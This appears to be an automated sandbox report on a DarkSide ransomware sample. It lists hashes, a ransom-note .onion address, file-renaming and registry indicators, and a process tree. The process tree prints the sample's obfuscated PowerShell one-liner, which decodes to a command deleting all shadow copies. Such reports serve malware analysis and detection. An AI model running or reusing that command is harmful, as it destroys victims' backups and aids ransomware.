Analysis
-
max time kernel
57s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
04-08-2021 17:53
Static task
static1
Behavioral task
behavioral1
Sample
DarkSide_01_05_2021_30KB.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
DarkSide_01_05_2021_30KB.bin.exe
Resource
win10v20210410
General
-
Target
DarkSide_01_05_2021_30KB.bin.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config
Extracted
C:\\README.7b336f65.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
DarkSide_01_05_2021_30KB.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\DebugUpdate.png => C:\Users\Admin\Pictures\DebugUpdate.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File renamed C:\Users\Admin\Pictures\SearchInstall.tiff => C:\Users\Admin\Pictures\SearchInstall.tiff.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\SkipConfirm.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\PushRequest.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\SearchInstall.tiff.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File renamed C:\Users\Admin\Pictures\SkipConfirm.png => C:\Users\Admin\Pictures\SkipConfirm.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\BlockComplete.tiff DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\MeasureWait.raw.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\MoveUnregister.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File renamed C:\Users\Admin\Pictures\MoveUnregister.png => C:\Users\Admin\Pictures\MoveUnregister.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File renamed C:\Users\Admin\Pictures\PushRequest.png => C:\Users\Admin\Pictures\PushRequest.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\BlockComplete.tiff.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\DebugUpdate.png.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File renamed C:\Users\Admin\Pictures\MeasureWait.raw => C:\Users\Admin\Pictures\MeasureWait.raw.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File renamed C:\Users\Admin\Pictures\BlockComplete.tiff => C:\Users\Admin\Pictures\BlockComplete.tiff.7b336f65 DarkSide_01_05_2021_30KB.bin.exe File opened for modification C:\Users\Admin\Pictures\SearchInstall.tiff DarkSide_01_05_2021_30KB.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
DarkSide_01_05_2021_30KB.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b336f65.BMP" DarkSide_01_05_2021_30KB.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b336f65.BMP" DarkSide_01_05_2021_30KB.bin.exe -
Modifies Control Panel 1 IoCs
Processes:
DarkSide_01_05_2021_30KB.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\WallpaperStyle = "10" DarkSide_01_05_2021_30KB.bin.exe -
Modifies registry class 5 IoCs
Processes:
DarkSide_01_05_2021_30KB.bin.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65 DarkSide_01_05_2021_30KB.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7b336f65\ = "7b336f65" DarkSide_01_05_2021_30KB.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon DarkSide_01_05_2021_30KB.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65 DarkSide_01_05_2021_30KB.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\7b336f65\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b336f65.ico" DarkSide_01_05_2021_30KB.bin.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeDarkSide_01_05_2021_30KB.bin.exepid process 2628 powershell.exe 2628 powershell.exe 2628 powershell.exe 2256 DarkSide_01_05_2021_30KB.bin.exe 2256 DarkSide_01_05_2021_30KB.bin.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
DarkSide_01_05_2021_30KB.bin.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeSecurityPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeTakeOwnershipPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeLoadDriverPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeSystemProfilePrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeSystemtimePrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeProfSingleProcessPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeIncBasePriorityPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeCreatePagefilePrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeBackupPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeRestorePrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeShutdownPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeDebugPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeSystemEnvironmentPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeRemoteShutdownPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeUndockPrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeManageVolumePrivilege 2256 DarkSide_01_05_2021_30KB.bin.exe Token: 33 2256 DarkSide_01_05_2021_30KB.bin.exe Token: 34 2256 DarkSide_01_05_2021_30KB.bin.exe Token: 35 2256 DarkSide_01_05_2021_30KB.bin.exe Token: 36 2256 DarkSide_01_05_2021_30KB.bin.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeBackupPrivilege 1724 vssvc.exe Token: SeRestorePrivilege 1724 vssvc.exe Token: SeAuditPrivilege 1724 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
DarkSide_01_05_2021_30KB.bin.exedescription pid process target process PID 2256 wrote to memory of 2628 2256 DarkSide_01_05_2021_30KB.bin.exe powershell.exe PID 2256 wrote to memory of 2628 2256 DarkSide_01_05_2021_30KB.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DarkSide_01_05_2021_30KB.bin.exe"C:\Users\Admin\AppData\Local\Temp\DarkSide_01_05_2021_30KB.bin.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
010c219c46b4439bc787644989e20389
SHA1f3a63066ab4446458bd6417386777e39e09b9b25
SHA2562a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa
SHA512c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8af7862a735a5ac85bfcfe81d2f7fbf5
SHA14c0ce14b7dc4d18802235868c7becfd1f78b8190
SHA256f7724c18d282d3194c77c1cab43ccb451b881c1cccc53be10fa035b2e1d667f3
SHA512c1fc86c4ba1ce9487d9ae2bcc619751dcc0e08ba7de02aa73607edcc8baa132a0004d3559fba79ac337e5e4b4b8e0f3780521d6c48252da43561697c265dbfba
-
memory/2628-114-0x0000000000000000-mapping.dmp
-
memory/2628-119-0x00000243F8D70000-0x00000243F8D71000-memory.dmpFilesize
4KB
-
memory/2628-122-0x00000243F9120000-0x00000243F9121000-memory.dmpFilesize
4KB
-
memory/2628-123-0x00000243F8F90000-0x00000243F8F92000-memory.dmpFilesize
8KB
-
memory/2628-124-0x00000243F8F93000-0x00000243F8F95000-memory.dmpFilesize
8KB
-
memory/2628-133-0x00000243F8F96000-0x00000243F8F98000-memory.dmpFilesize
8KB